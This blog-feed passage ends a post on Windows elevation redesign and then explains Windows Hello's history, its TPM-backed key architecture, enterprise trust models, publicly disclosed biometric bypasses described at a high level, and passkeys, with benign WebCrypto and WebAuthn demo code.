The December 2025 revert is the first iteration's learning round. The architecture is the right one. The application base catches up next. Forshaw's framing in January 2026 -- that Microsoft might have shipped this as a configurable mode rather than replacing admin approval completely -- is a reasonable critique, and the re-enablement is likely to address it. Until then, the operational reality on most stable Windows devices is the classic split-token model, with all the bypass canon it implies, and the SMAA design remains an Insider-Preview-and-policy-opted-in posture.

What stays unchanged is the structural insight. The mechanism Microsoft used to make the elevation path a boundary is not novel; multi-user accounts have shipped in Windows NT since 1993. What changed is the classification. Microsoft accepted, after twenty years of evidence, that the elevation pipeline needed to be a security boundary, and accepted with it the engineering cost: separate accounts, separate profiles, separate logon sessions, removal of auto-elevation, a credential gate instead of a click-through, an audit-trail ETW provider, and a willingness to ship bulletin-grade fixes for every Forshaw finding. The classification was the engineering decision. Everything else followed.

This is what it took, in mechanism and in time, to make the elevation path real [@forshaw-pz-jan2026].

No Secrets to Steal: How Windows Hello Eliminated the Shared Secret

noreply@paragmali.com (Parag Mali) — Tue, 28 Apr 2026 00:00:00 GMT

**Windows Hello replaces passwords with biometric authentication backed by hardware cryptography.** Your face or fingerprint unlocks a private key sealed inside a TPM chip -- no biometric data ever leaves your device, and no shared secret crosses the network. After a decade of enterprise growing pains and a cat-and-mouse security arms race, Microsoft made passwordless the default for new accounts in May 2025, with passkeys now achieving a 98% sign-in success rate. The password's 64-year reign is ending -- but open problems in biometric spoofing, credential portability, and quantum-resistant cryptography mean the replacement is still under construction.

Why Passwords Must Die

In 2024, Microsoft observed 7,000 password attacks every second [@ms-passkeys] -- more than double the rate from 2023. Picture this: a user types their carefully memorized 16-character password into what looks like a corporate login page. The page is a phishing replica. In under a second, that password -- the one they have been rotating every 90 days for three years -- belongs to someone else.

The password Corbato invented as a quick fix in 1961 had become the single greatest attack surface in computing.

The problem is not weak passwords. The problem is passwords themselves. They are shared secrets -- a piece of information that both you and the server know. Anything a server stores can be stolen. Anything you type can be intercepted. Anything you memorize can be phished. These are not implementation bugs. They are design properties.

It was not supposed to be this way. In 1961, Fernando Corbato [@wiki-password] introduced computer passwords at MIT as a quick fix for multi-user mainframes. Users needed separate file spaces on the Compatible Time-Sharing System (CTSS), and a secret string was the simplest way to provide per-user isolation. It was a temporary measure for a specific engineering constraint.

That temporary measure lasted 64 years.

What if authentication did not require a secret at all? What if your face unlocked a cryptographic key -- and that key never left your device? That is the promise of Windows Hello. But the story of how we got here passes through a gelatin finger, a low-cost USB device, and a near-infrared camera that shattered assumptions about what "secure" really means.

The Password's 64-Year Reign: A Brief History of Authentication Failure

In 1966, a software bug in MIT's CTSS printed the master password file to every user's terminal -- the first known password breach [@wiki-password].

The 1966 CTSS incident was not a hack. A system administrator accidentally swapped the login message file with the master password file. Every user who logged in that day saw everyone else's password on screen.

It was a sign of things to come. For the next six decades, every generation of authentication would solve one problem -- and reveal a deeper one.

gantt
    title Authentication Evolution
    dateFormat YYYY
    axisFormat %Y
    section Passwords
    Plaintext passwords on CTSS :1961, 1979
    section Hashed
    UNIX crypt / hashed passwords :1979, 1993
    section Network Auth
    NTLM challenge-response :1993, 2000
    Kerberos / Windows AD :2000, 2015
    section Biometrics
    Software biometrics via WBF :2009, 2015
    section Windows Hello
    Hello + TPM asymmetric auth :2015, 2021
    ESS + VBS + Cloud Trust :2021, 2024
    Passkeys and passwordless default :2024, 2026

Generation 0: Plaintext passwords (1961)

Corbato's CTSS stored passwords in plaintext [@wiki-password] in a file accessible to administrators. The model was simple: the user enters a string, the system compares it to a stored copy, and access is granted on match. The key assumption -- that only the legitimate user knows the password -- held exactly as long as the system remained uncompromised. Which was about five years.

Generation 1: Hashed passwords (1970s)

The obvious fix: do not store passwords in plaintext. In 1979, Robert Morris and Ken Thompson published the design behind UNIX's crypt() function [@wiki-crypt], a one-way hash based on a modified DES algorithm with a 12-bit salt. Even if an attacker stole the hash file, they could not directly read the passwords. They would have to try every possible password and compare hashes -- a brute-force attack.

For a while, that was computationally infeasible. Then Moore's Law caught up. By the late 1990s, EFF's DES Cracker and distributed.net had reduced 56-bit DES keysearch to 22 hours and 15 minutes [@eff-des], making DES-based crypt() increasingly untenable against well-funded attackers. Users also chose weak, predictable passwords, and attackers built rainbow tables that mapped common passwords to their hashes instantly.

Windows made this worse. LAN Manager (LM) hashes [@ms-lm-hash] uppercased every password, limited them to 14 characters, and split them into two 7-byte halves hashed independently.

The LM hash design was spectacularly bad. By splitting a 14-character password into two 7-character halves, it reduced the brute-force search space from 95^14 to 2 x 95^7 -- a reduction of over 34 trillion times. An attacker could crack each half separately.

Rainbow tables could crack LM hashes in seconds. Microsoft eventually disabled LM hashing by default in Windows Vista, but the damage to enterprise networks had been done.
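The search-space arithmetic above can be checked directly. The following is a minimal sketch that assumes the 95-symbol printable ASCII alphabet used in the text; the constant names are illustrative only.

```javascript
// Assumption: 95 printable ASCII symbols, as in the text above.
const ALPHABET = 95n;

// One 14-character password treated as a single unit.
const fullSpace = ALPHABET ** 14n;

// One 7-character half, and the two halves attacked independently.
const halfSpace = ALPHABET ** 7n;
const splitSpace = 2n * halfSpace;

// BigInt division truncates, which is fine for an order-of-magnitude check.
const reduction = fullSpace / splitSpace;

console.log("Full 14-char space :", fullSpace.toString());
console.log("Split search space :", splitSpace.toString());
console.log("Reduction factor   :", reduction.toString());
```

Because LM also uppercases the password before hashing, the effective alphabet per half is smaller than 95 symbols, so the real search space shrinks further than this sketch shows.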

Generation 2: Network challenge-response (1990s)

The next insight: stop transmitting passwords over the network. NTLM [@ms-lm-hash] used a challenge-response protocol -- the server sends a random nonce, the client computes a response using the nonce and the password hash, and the server verifies the response. The password never crosses the wire.

Kerberos [@ms-kerberos], adopted in Windows 2000, improved further with mutual authentication, time-limited tickets, and single sign-on. It was elegant protocol engineering.

But the fundamental problem remained: shared secrets. NTLM was vulnerable to pass-the-hash attacks [@mitre-pth] -- an attacker who obtains the password hash can authenticate without ever knowing the password. Kerberos tickets could be stolen (Golden Ticket, Silver Ticket attacks). Both systems still depended on users choosing strong passwords, which they consistently failed to do.

Generation 3: First software biometrics (2000s)

By the early 2000s, fingerprint readers appeared on Windows laptops. The idea was appealing: replace "something you know" with "something you are." No password to remember, no password to steal.

Microsoft introduced the Windows Biometric Framework (WBF) [@ms-wbf] in Windows 7 (2009), standardizing the API and driver interface. Before WBF, each fingerprint reader vendor -- AuthenTec, Validity, UPEK -- shipped proprietary middleware that injected into the Windows logon process. The result was inconsistent security, driver conflicts, and no centralized management.

But WBF solved the wrong problem. It standardized the API while leaving the security model unchanged: biometric templates stored with weak encryption in user-accessible files, matching running in OS user space, and no hardware isolation whatsoever.

In 2002, Tsutomu Matsumoto at Yokohama National University demonstrated the "gummy finger" attack -- creating gelatin replicas of fingerprints that fooled approximately 80% of commercial readers [@gummy-finger]. The materials cost just a few dollars. Without liveness detection and hardware protection, biometrics were security theater.

The pattern was unmistakable. Each generation protected a different layer -- plaintext storage, hash computation, network transmission, biometric convenience -- but each left the next layer exposed. By 2013, passwords were fundamentally broken, and software-only biometrics were not the answer. Then Apple proved something nobody expected.

The Catalyst: How Touch ID Changed Everything

September 2013. Apple unveils the iPhone 5S [@apple-touchid] with a fingerprint sensor embedded in the home button. It was not the first phone with a fingerprint reader -- Motorola's ATRIX 4G shipped with a biometric fingerprint reader in 2011 [@motorola-atrix]. But it was the first one that hundreds of millions of people actually used.

What made Touch ID different was not the sensor. It was the Secure Enclave -- a dedicated secure subsystem integrated into Apple's system-on-chip and isolated from the main processor [@apple-secure-enclave]. The enclave runs its own microkernel, stores biometric material in protected memory, and keeps the matching pipeline outside the reach of normal iOS processes. Apple designed it so the biometric path stayed inside the enclave boundary rather than becoming just another app-visible API.

Note: Apple controlled the sensor, the SoC, the Secure Enclave hardware, and iOS. This vertical integration meant the entire biometric pipeline -- from sensor capture through template matching to key release -- could be designed as a single trust chain. No Windows OEM could match this in 2013 because the sensor, CPU, and OS came from three different vendors with no unified security model.

That architecture established a pattern that Windows Hello would later follow with the TPM. Both isolate secrets in hardware, but they do different jobs: the Secure Enclave is a richer coprocessor that protects both biometric processing and keys, while the TPM is a narrower trust anchor for key storage, signing, and attestation. Apple's newer Secure Enclave documentation also emphasizes encrypted enclave memory, whereas Windows later needed ESS and VBS to give its broader PC system a comparable isolation boundary [@apple-secure-enclave; @ms-ess].

Touch ID proved two things simultaneously: that consumer biometrics could be both secure and delightful, and that the key to secure biometrics was hardware isolation, not better algorithms.

The FIDO Alliance had already been working on the standards side. Founded in July 2012 [@fido-launch] by Michael Barrett (PayPal's CISO), Ramesh Kesanupalli (Nok Nok Labs), and partners including Lenovo, Validity Sensors, and Infineon, the Alliance set out to create open standards for strong authentication that would replace passwords. Its first protocols split the problem in two: UAF defined a passwordless flow where a device-local biometric or PIN unlocks a per-service key pair [@fido-uaf], while U2F defined a hardware-token second factor that signs a challenge after the user taps the device [@fido-u2f]. FIDO2 later unified these ideas into the WebAuthn + CTAP stack used for passkeys today [@fido-how].

The convergence was forming: consumer demand (Apple proved people wanted biometrics), open standards (FIDO defined how it should work), and enterprise need (Microsoft tracked thousands of password attacks per second). Apple showed what was possible. The FIDO Alliance defined how it should work. Microsoft was about to show how to do it at the scale of an entire operating system.

The Breakthrough: Windows Hello's Architecture

On March 17, 2015, Joe Belfiore announced Windows Hello. The key insight was not an algorithm -- it was an architecture. What if the biometric never leaves the device, and the authentication secret is a cryptographic key that even the server never sees?

Trusted Platform Module (TPM): A dedicated security chip soldered to a computer's motherboard (or implemented in firmware) that generates, stores, and manages cryptographic keys. The TPM can create key pairs where the private key is physically bound to the chip and cannot be exported -- even the operating system cannot extract it. Windows Hello uses TPM 2.0 to seal authentication keys.

Asymmetric cryptography: A cryptographic system using two mathematically related keys: a public key (shared openly) and a private key (kept secret). Data encrypted with one key can only be decrypted with the other. In Windows Hello, the TPM holds the private key and signs authentication challenges; the server holds only the public key, which is useless to an attacker.

Here is how Windows Hello authentication [@ms-whfb] works:

sequenceDiagram
    participant U as User
    participant B as Biometric Sensor
    participant D as Device OS
    participant T as TPM Chip
    participant S as Identity Server
    U->>B: Present face or fingerprint
    B->>D: Capture biometric sample
    D->>D: Match against stored template
    Note over D: Local verification only
    D->>T: Request private key release
    T->>T: Verify TPM-bound policy
    T-->>D: Private key available for signing
    S->>D: Send challenge nonce
    D->>D: Sign nonce with private key
    D->>S: Return signed assertion
    S->>S: Verify signature with public key
    S->>D: Authentication success

Step 1: Enrollment. The TPM generates an asymmetric key pair -- RSA-2048 or ECDSA P-256. The private key is sealed inside the TPM and cannot be exported. The public key is registered with the identity provider (Microsoft Entra ID, formerly Azure AD, or on-premises AD) [@ms-whfb].

Step 2: Biometric enrollment. The user registers their face (via a near-infrared camera) or fingerprint. The biometric template is stored locally on the device, protected by the OS.

Step 3: Authentication. The user presents their biometric gesture. The device verifies it locally against the stored template. If the match succeeds, the TPM authorizes use of the private key; the key itself stays inside the chip. The identity server sends a random challenge nonce; the TPM signs it with the private key, and the device returns the signed assertion. The server verifies the signature using the stored public key. No shared secret ever crosses the network.

Key idea: Windows Hello's breakthrough was architectural, not algorithmic. By pairing biometrics with hardware-backed asymmetric cryptography, it eliminated shared secrets entirely. No biometric data ever leaves the device. No password hash sits on a server waiting to be stolen. Each authentication is a fresh, unreplayable cryptographic signature.

False Acceptance Rate (FAR): The probability that a biometric system incorrectly accepts an unauthorized person. Windows Hello requires a facial recognition FAR below 0.001% (1 in 100,000) [@ms-biometric-reqs]. Apple's Face ID is documented at less than 0.0001% (1 in 1,000,000) for a single enrolled face [@apple-faceid-security]. Lower is better -- but zero is theoretically impossible.

Near-infrared (NIR) camera: A camera technology that captures light in the 700--1000 nanometer wavelength range, invisible to the human eye. Windows Hello uses NIR cameras because infrared illumination works regardless of ambient lighting and is harder to spoof with printed photos or screens -- standard displays do not emit near-infrared light. Or so everyone assumed until 2025.

Note: Without a TPM, Windows Hello falls back to software key storage, dramatically weakening the security model. The private key becomes a file protected by the OS rather than a secret sealed in tamper-resistant silicon. Always verify TPM 2.0 is present and active before relying on Hello's security properties.

A Trusted Platform Module is not a general-purpose processor. It is a purpose-built chip (or firmware module) designed for a narrow set of cryptographic operations: key generation, key storage, signing, and attestation.

When Windows Hello enrolls a user, the TPM generates a key pair using its internal random number generator. The private key never exists outside the chip's boundary -- it is generated inside the TPM and stays there. The TPM enforces access policies: it will only release the key for signing after the device OS confirms that the biometric match succeeded. Even a compromised operating system kernel cannot extract the private key from a hardware TPM.

This is fundamentally different from software key storage, where the key is a file on disk that any sufficiently privileged process can read.

The PIN paradox

Windows Hello also revived the humble PIN -- and made it more secure than a complex password. A Hello PIN [@ms-whfb] is device-bound: it unlocks the TPM-stored private key on that specific device. A stolen PIN is useless without physical access to the hardware. Compare this to a password, which works from any device on earth. A 4-digit PIN on Windows Hello is architecturally more secure than a 20-character password reused across services.

Microsoft Passport was briefly announced as a separate product in early 2015 -- the cryptographic key infrastructure behind Windows Hello. By late 2015, the branding was merged. "Microsoft Passport" was retired and its functionality absorbed into "Windows Hello" and "Windows Hello for Business." The separate brand caused market confusion and was quickly abandoned.

The biometric FAR can be expressed mathematically. For a face recognition system that performs $n$ independent comparisons (against $n$ enrolled users, or across $n$ repeated attempts), each with a per-comparison FAR of $p$, the probability of at least one false acceptance across all comparisons is:

$$P(\text{false accept}) = 1 - (1 - p)^n$$

For Windows Hello's required FAR of $10^{-5}$ [@ms-biometric-reqs] and a single user, this gives a 0.001% chance per authentication attempt. With 1,000 attempts, the cumulative probability rises to roughly 1% -- which is why lockout policies and anti-hammering protections exist.
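The formula is easy to evaluate for different attempt counts. The sketch below assumes independent comparisons, as the formula does; the function name is illustrative.

```javascript
// P(at least one false accept) = 1 - (1 - p)^n, assuming independence.
// log1p/expm1 keep precision when p is very small.
function cumulativeFalseAccept(p, n) {
  return -Math.expm1(n * Math.log1p(-p));
}

const FAR = 1e-5; // Windows Hello's required upper bound for face

for (const attempts of [1, 100, 1000, 100000]) {
  const percent = cumulativeFalseAccept(FAR, attempts) * 100;
  console.log(`${attempts} attempts: ${percent.toFixed(3)}%`);
}
```

The growth is close to linear while $np$ is small, which is why capping the number of attempts is such an effective control.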

{`
// This demonstrates the core idea behind Windows Hello's authentication.
// In the real system, the private key lives in the TPM and never leaves.

async function simulateHelloAuth() {
  // Step 1: Enrollment -- generate key pair (TPM does this in hardware)
  const keyPair = await crypto.subtle.generateKey(
    { name: "ECDSA", namedCurve: "P-256" },
    true, // extractable for demo only; TPM keys are NOT extractable
    ["sign", "verify"]
  );
  console.log("Key pair generated (simulating TPM enrollment)");

  // Step 2: Server sends a challenge nonce
  const challenge = crypto.getRandomValues(new Uint8Array(32));
  console.log("Server challenge:", Array.from(challenge.slice(0, 8)).map(b => b.toString(16).padStart(2, '0')).join(''));

  // Step 3: Device signs the challenge with the private key
  const signature = await crypto.subtle.sign(
    { name: "ECDSA", hash: "SHA-256" },
    keyPair.privateKey,
    challenge
  );
  console.log("Signed assertion:", new Uint8Array(signature).slice(0, 16).join(',') + '...');

  // Step 4: Server verifies with the public key
  const valid = await crypto.subtle.verify(
    { name: "ECDSA", hash: "SHA-256" },
    keyPair.publicKey,
    signature,
    challenge
  );
  console.log("Server verification:", valid ? "SUCCESS" : "FAILED");
  console.log("\nNote: The private key never left the device.");
  console.log("The server only has the public key -- useless to an attacker.");
}

simulateHelloAuth();
`}

Windows Hello solved the fundamental password problem: no shared secrets ever traverse the network. But the story does not end here -- because researchers would soon discover that protecting the key was not enough if you could not trust the camera.

The Enterprise Gambit: Windows Hello for Business

Windows Hello delighted consumers. But enterprise IT administrators asked a harder question: how do I deploy this to 50,000 machines managed by Active Directory?

WebAuthn: The W3C Web Authentication API -- a browser standard that lets websites request public-key-based authentication from platform authenticators (like Windows Hello) or roaming authenticators (like security keys). WebAuthn became a W3C Recommendation on March 4, 2019, forming the browser-side component of the FIDO2 standard alongside CTAP (Client-to-Authenticator Protocol).

Windows Hello for Business (WHfB) [@ms-whfb] launched in 2016 with two trust types, each carrying its own infrastructure burden:

Certificate Trust required a full Public Key Infrastructure -- a Certificate Authority hierarchy, CRL distribution points, certificate templates, and ADFS (Active Directory Federation Services). For organizations that already had PKI, this was a natural fit. For everyone else, it meant weeks of setup.

Key Trust required Windows Server 2016+ domain controllers with AD schema extensions. Simpler than Certificate Trust, but still demanded on-premises infrastructure that many cloud-first organizations were trying to eliminate.

Yogesh Mehta, Principal Group Program Manager at Microsoft, evangelized Windows Hello for Business at Ignite 2016. He would later be credited as a key figure in the FIDO2 certification effort. The original Belfiore blog post URL announcing Windows Hello is now lost to link rot.

Two milestones accelerated adoption. In March 2019, WebAuthn became a W3C Recommendation [@w3c-webauthn] -- a universal browser API for public-key authentication. Android had already been FIDO2-certified in February 2019 [@fido-android-certification]; two months after WebAuthn's recommendation, Windows Hello became one of the first FIDO2-certified platform authenticators built into a desktop operating system [@fido-certification]. Together, these meant that Windows Hello could authenticate not just to Windows, but to any FIDO2-supporting website through any modern browser.

Note: Unless you have specific PKI requirements, Cloud Trust -- announced by Microsoft in 2022 [@ms-cloud-trust-ga] -- eliminates much of the complexity of certificate and key trust deployments. It requires Entra ID configuration and Microsoft Entra Kerberos rather than a full on-prem PKI or ADFS stack, which is why Microsoft now treats it as the default recommendation for many hybrid organizations.

flowchart TD
    A[Choose a WHfB Trust Model] --> B{Cloud-native org using Entra ID?}
    B -->|Yes| C[Cloud Trust -- Recommended]
    B -->|No| D{On-prem AD still required?}
    D -->|Yes| E{Existing PKI infrastructure?}
    D -->|No| C
    E -->|Yes| F[Certificate Trust]
    E -->|No| G[Key Trust]
    C --> H[Simplest deployment: Entra ID only]
    F --> I[Most complex: CA + CRL + ADFS]
    G --> J[Moderate: Server 2016+ DCs required]

Cloud Trust delegates all validation to Entra ID. No on-premises PKI, no ADFS, no certificate templates. Best for organizations that are cloud-native or hybrid with Entra ID.

Key Trust requires Windows Server 2016+ domain controllers with AD schema extensions. Choose this if you need on-premises AD support but do not have PKI.

Certificate Trust requires the full PKI stack -- CA hierarchy, CRL distribution, ADFS. Choose this only if your organization already has PKI infrastructure and needs certificate-based authentication for regulatory compliance.
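The decision tree in this section can be written down as a small function. This is a hypothetical helper for illustration only: the function and field names are assumptions, not part of any Microsoft tooling, and a real deployment decision involves more inputs than three booleans.

```javascript
// Hypothetical helper mirroring the trust-model flowchart above.
// Field names are illustrative assumptions, not a Microsoft API.
function chooseTrustModel({ cloudNativeEntra, needsOnPremAD, hasPKI }) {
  // Cloud-native organizations using Entra ID go straight to Cloud Trust.
  if (cloudNativeEntra) return "Cloud Trust";
  // Without an on-premises AD requirement, Cloud Trust is still the answer.
  if (!needsOnPremAD) return "Cloud Trust";
  // On-premises AD required: existing PKI decides between the other two.
  return hasPKI ? "Certificate Trust" : "Key Trust";
}

const scenarios = [
  { cloudNativeEntra: true, needsOnPremAD: false, hasPKI: false },
  { cloudNativeEntra: false, needsOnPremAD: true, hasPKI: true },
  { cloudNativeEntra: false, needsOnPremAD: true, hasPKI: false }
];

for (const scenario of scenarios) {
  console.log(JSON.stringify(scenario), "->", chooseTrustModel(scenario));
}
```

Encoding the tree this way makes the ordering explicit: PKI only matters once on-premises AD is confirmed as a hard requirement.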

Enterprise deployment was painful -- multiple trust models confused administrators, and adoption was slower than hoped. But it was about to get much worse. In July 2021, a researcher with a low-cost USB board would demonstrate that Windows Hello's most basic assumption was wrong.

The Security Arms Race: When Researchers Fought Back

Omer Tsarfati had a simple question: what happens if you plug in a USB device that claims to be an IR camera? The answer would force Microsoft to rethink Windows Hello's entire trust model.

The USB camera bypass (CVE-2021-34466)

In July 2021, Tsarfati at CyberArk Labs [@cyberark-bypass] revealed that Windows Hello's facial recognition accepted input from any USB device presenting itself as an IR camera -- with no attestation, no hardware trust verification, and no device identity check.

Tsarfati's attack required only a single IR frame -- not video, not a 3D reconstruction, just one static infrared image of the target's face. The simplicity of the attack was what made it so alarming.

Using an NXP evaluation board [@cyberark-bypass], Tsarfati constructed a custom USB device that replayed a single IR frame of a target's face. Plug it in, and Windows Hello authenticated the attacker as the target. At the time, 85% of Windows 10 users employed Windows Hello [@cyberark-bypass] -- making this a massive attack surface.

The insight was devastating: the TPM protected the key, but nobody protected the camera. Windows Hello's threat model assumed trusted camera hardware. The USB specification makes no such guarantee.

Virtualization-Based Security (VBS): A Windows feature that uses the hardware hypervisor to create an isolated virtual environment (Virtual Trust Level 1, or VTL1) separated from the main OS kernel (VTL0). Even if an attacker gains SYSTEM-level access to the Windows kernel, they cannot read memory in VTL1. Windows Hello's Enhanced Sign-in Security uses VBS to isolate biometric processing.

Microsoft's response: ESS and VBS

Microsoft's answer came with Windows 11: Enhanced Sign-in Security (ESS) [@ms-ess], which moved biometric matching into the VBS-protected enclave described above. Even a compromised Windows kernel cannot access templates or tamper with the comparison pipeline there.

flowchart TD
    subgraph VTL0["VTL0: Normal OS Environment"]
        A[Windows Kernel]
        B[Applications]
        C[Standard Drivers]
    end
    subgraph VTL1["VTL1: Secure World -- ESS"]
        D[Biometric Matching Engine]
        E[Encrypted Template Storage]
        F[Credential Isolation]
    end
    G[Hypervisor] --- VTL0
    G --- VTL1
    H[Secure Biometric Sensor] --> D
    A -.->|Blocked by Hypervisor| D
    B -.->|Blocked by Hypervisor| E

Alongside ESS, Microsoft rolled out Cloud Trust in 2022 [@ms-cloud-trust-ga], eliminating the need for on-premises PKI for many deployments. Two problems -- biometric isolation and deployment complexity -- were finally being addressed in parallel.

Red Bleed: the NIR assumption shatters (CVE-2025-26644)

The arms race was not over. In August 2025, researchers Bowen Hu, Kuo Wang, and Chip Hong Chang at Nanyang Technological University presented "Red Bleed" [@red-bleed] at USENIX Security 2025. Microsoft had already patched CVE-2025-26644 [@wiz-cve] in April 2025, but the full attack was now public.

Windows Hello's NIR facial recognition relied on a critical assumption: no commercial display can emit near-infrared light. The researchers shattered this assumption [@nvd-red-bleed] with a custom-built LCD screen costing less than $400 that could display NIR images. They trained a Variational Autoencoder to convert widely available RGB photos -- from social media, video calls, public sources -- into convincing NIR facial videos. The result: a presentation attack that bypassed Windows Hello face authentication and prompted liveness-detection hardening [@red-bleed-pdf].

The Red Bleed attack name references the "red bleed" phenomenon in LCD panels where a small amount of near-infrared light leaks through the color filters -- the researchers amplified this effect with a custom panel.

Microsoft's April 2025 patch strengthened liveness detection and anti-spoofing measures for NIR authentication.

Faceplant: the template swap (CVE-2026-20804)

The third major attack came from ERNW Research in August 2025. At Black Hat USA 2025, Baptiste David and Tillmann Oßwald's official conference briefing "Windows Hell No for Business" [@blackhat-windows-hell-no] detailed the Faceplant template-injection attack, which they later documented technically on ERNW's research blog [@faceplant].

In practice, an attacker with local administrator privileges could enroll their own face on one machine, extract the resulting template, and transplant it into the victim's biometric database on the target device. After injection, Windows Hello accepted the attacker's face for the victim's account. ERNW traced the weakness to software-protected templates that a local administrator could extract and replace on non-ESS systems [@faceplant].

ESS blocks this attack completely -- biometric templates in VTL1 are inaccessible even to local administrators. But many enterprise PCs lack ESS-compatible hardware.

Note: Many enterprise PCs -- particularly those shipped without an ESS-certified built-in biometric sensor, including many AMD-based and older Intel-based machines -- lack ESS capability. On these machines, biometric templates remain in software-protected storage vulnerable to the Faceplant attack. Verify hardware compatibility before assuming biometric isolation is active.

flowchart TD
    A["2015: Windows Hello Launch"] --> B["2021: CVE-2021-34466\nUSB Camera Spoofing"]
    B --> C["Microsoft Response:\nESS + VBS Isolation"]
    C --> D["2025: CVE-2025-26644\nRed Bleed NIR Attack"]
    D --> E["Microsoft Response:\nLiveness Detection Update"]
    E --> F["2025: CVE-2026-20804\nFaceplant Template Injection"]
    F --> G["Defense: ESS Hardware\nIsolation Blocks Attack"]
    G --> H["Ongoing: Adversarial ML\nArms Race"]
    classDef fake fill:#7a3030,stroke:#c44b4b,color:#fce8e8
    class B fake,stroke:#333
    class D fake,stroke:#333
    class F fake,stroke:#333
    classDef real fill:#2f5a3a,stroke:#5fa872,color:#dff5e4
    class C real,stroke:#333
    class E real,stroke:#333
    class G real,stroke:#333

Key idea: Each generation of authentication protected a new layer -- but every layer revealed the next attack surface. The TPM protected the key. ESS protected the biometric pipeline. Liveness detection hardened NIR authentication. Security is never a single solution. It is a stack, and each layer needs its own defense.

The arms race revealed a humbling truth: biometric authentication is not a silver bullet. It is a layered defense -- and each layer needs its own protection. But while researchers probed Windows Hello's defenses, the industry was converging on something bigger.

The Convergence: Passkeys and the Passwordless Future

May 5, 2022. Apple, Google, and Microsoft [@passkeys-announcement] -- three companies that agree on almost nothing -- issued a joint announcement: they were all committing to passkeys.

A FIDO2/WebAuthn credential built on the same public-key model as Windows Hello. Passkeys can be device-bound (like traditional Hello credentials, stored in the TPM) or synced across devices through a credential manager such as iCloud Keychain or Google Password Manager. The local biometric or PIN check stays on-device; the relying party only sees public keys and signatures.

FIDO2 had a usability problem. Credentials were bound to a single device. Lose your laptop, lose your credentials. Passkeys solved this by introducing synced credentials -- private keys encrypted and distributed across a user's devices through their platform credential manager. The FIDO Alliance's protocol [@fido-how] maintained the cryptographic guarantees (no shared secrets, phishing resistance) while adding the portability users demanded.

"World Password Day" was symbolically renamed "World Passkey Day" in May 2025, when Microsoft announced that new accounts would default to passwordless authentication.

The numbers tell the story

In May 2025, Microsoft made new accounts passwordless by default and reported the following figures [@ms-passkeys]:

Nearly 1 million passkey registrations daily [@ms-passkeys]
98% passkey sign-in success rate [@ms-passkeys] vs. 32% for passwords
Passkey sign-ins 8x faster [@ms-passkeys] than password + MFA

How the platforms compare

Dimension	Windows Hello (WHfB)	Apple Face ID / Passkeys	Google Passkeys	FIDO2 Hardware Keys
Hardware root of trust	TPM 2.0	Secure Enclave	TEE / Titan M	On-key secure element
Credential sync	No (device-bound)	Yes (iCloud Keychain)	Yes (Google PM)	No (hardware-bound)
Cross-platform	Windows only	Apple + QR/BT bridge	Android/Chrome + QR/BT	Universal USB/NFC/BT
FAR (face)	< 0.001%	< 0.0001%	Varies by OEM	N/A
Enterprise management	Intune, GP, Conditional Access	Limited (Apple MDM)	Android Enterprise	Manual provisioning
Recovery on device loss	Re-enroll on new device	iCloud backup restore	Google Account restore	Requires backup key
NIST AAL level	AAL2	AAL2	AAL2	AAL3-eligible
Best suited for	Windows enterprise	Apple platform	Android / cross-platform web	High-assurance regulated

Sources: Microsoft biometric requirements [@ms-biometric-reqs], Apple passkey security [@apple-passkeys-security], Google passkeys [@google-passkeys], FIDO specifications [@fido-specs]

Google's passkey story is centered on Google Password Manager: passkeys created on Android or Chrome sync across Android, ChromeOS, Windows, macOS, Linux, and Chrome browsers where the same account is available [@google-passkeys]. FIDO2 hardware security keys (YubiKey, Google Titan) take the opposite approach: the credential stays on a dedicated secure element, works across platforms via USB/NFC/Bluetooth, and must be provisioned deliberately on each account [@fido-u2f; @fido-how]. That trade-off buys the highest assurance available today; multi-factor cryptographic hardware authenticators are the mainstream route to NIST AAL3 [@nist-aal].

sequenceDiagram
    participant U as User
    participant B as Browser
    participant A as Platform Authenticator
    participant S as Relying Party Server
    U->>B: Click Register with Passkey
    B->>S: Request registration options
    S->>B: Return challenge + relying party info
    B->>A: navigator.credentials.create()
    A->>U: Prompt biometric verification
    U->>A: Present face / fingerprint / PIN
    A->>A: Generate key pair in TPM
    A->>B: Return public key + attestation
    B->>S: Send credential to server
    S->>S: Store public key for user
    S->>B: Registration complete

// This shows the structure of a WebAuthn registration request.
// In production, the challenge comes from your server.

const registrationOptions = {
  publicKey: {
    // Random challenge from the server (32 bytes)
    challenge: crypto.getRandomValues(new Uint8Array(32)),

    // Your service identity
    rp: {
      name: "Example Corp",
      id: "example.com"
    },

    // User identity
    user: {
      id: new Uint8Array([1, 2, 3, 4]),
      name: "alice@example.com",
      displayName: "Alice"
    },

    // Acceptable key types (ES256 = ECDSA P-256)
    pubKeyCredParams: [
      { type: "public-key", alg: -7 }  // ES256
    ],

    // Request a resident/discoverable credential (passkey)
    authenticatorSelection: {
      residentKey: "required",
      userVerification: "required"  // Biometric or PIN
    },

    // 5-minute timeout
    timeout: 300000
  }
};

console.log("Registration options structure:");
console.log(JSON.stringify(registrationOptions.publicKey.rp, null, 2));
console.log("\nKey algorithm: ES256 (ECDSA P-256)");
console.log("Resident key: required (discoverable passkey)");
console.log("User verification: required (biometric or PIN)");
console.log("\nIn production, call: navigator.credentials.create(registrationOptions)");
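The registration flow ends with the server receiving the new credential. As a rough sketch of one part of what the relying party checks at that point, the Node.js snippet below issues a random challenge and validates the `type`, `challenge`, and `origin` fields of the `clientDataJSON` the browser returns. The helper names `issueChallenge` and `checkClientData` and the origin `https://example.com` are hypothetical, and attestation and signature verification are deliberately left out, so this is not a complete verification procedure.

```javascript
const { randomBytes } = require("node:crypto");

// Hypothetical helper: a 32-byte random challenge, base64url-encoded,
// which is the form in which the client echoes it back in clientDataJSON.
function issueChallenge() {
  return randomBytes(32).toString("base64url");
}

// Hypothetical helper: compare the three clientDataJSON fields against what
// the server expects. Attestation and signature checks are NOT performed here.
function checkClientData(clientDataJSON, expectedChallenge, expectedOrigin) {
  const data = JSON.parse(Buffer.from(clientDataJSON).toString("utf8"));
  if (data.type !== "webauthn.create") return { ok: false, reason: "wrong type" };
  if (data.challenge !== expectedChallenge) return { ok: false, reason: "challenge mismatch" };
  if (data.origin !== expectedOrigin) return { ok: false, reason: "origin mismatch" };
  return { ok: true };
}

// Simulated browser response (made-up data for illustration only).
const challenge = issueChallenge();
const fakeClientData = Buffer.from(
  JSON.stringify({ type: "webauthn.create", challenge, origin: "https://example.com" })
);

console.log(checkClientData(fakeClientData, challenge, "https://example.com"));
console.log(checkClientData(fakeClientData, challenge, "https://evil.example"));
```

The origin comparison is where phishing resistance shows up in practice: a credential ceremony started on a look-alike site reports that site's origin, and the check fails.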

Deploying Windows Hello Today

